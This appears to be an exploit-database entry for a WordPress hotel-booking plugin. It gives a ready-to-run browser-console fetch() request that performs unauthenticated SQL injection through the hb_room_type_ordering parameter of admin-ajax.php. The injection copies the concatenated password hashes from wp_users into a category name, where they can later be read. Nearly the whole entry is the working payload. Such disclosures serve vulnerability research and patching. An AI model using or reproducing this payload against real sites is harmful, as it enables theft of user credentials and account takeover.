Share
## https://sploitus.com/exploit?id=WPEX-ID:8EA46B9A-5239-476B-949D-49546371EAC1
Run the below command in the developer console of the web browser while being on the blog unauthenticated

fetch("/wp-admin/admin-ajax.php", {"headers": {"content-type": "application/x-www-form-urlencoded; charset=UTF-8"},"body": 'action=x&taxonomy=hb_room_type&hb_room_type_ordering[1]=0 END, name=(SELECT GROUP_CONCAT(user_pass) FROM wp_users), term_id=CASE when 1=1 THEN 1 ',"method": "POST"});

The above will set the name of the 1st category name (see in the backend as admin) to GROUP_CONCAT of user passwords (even though the request will result in an error 400)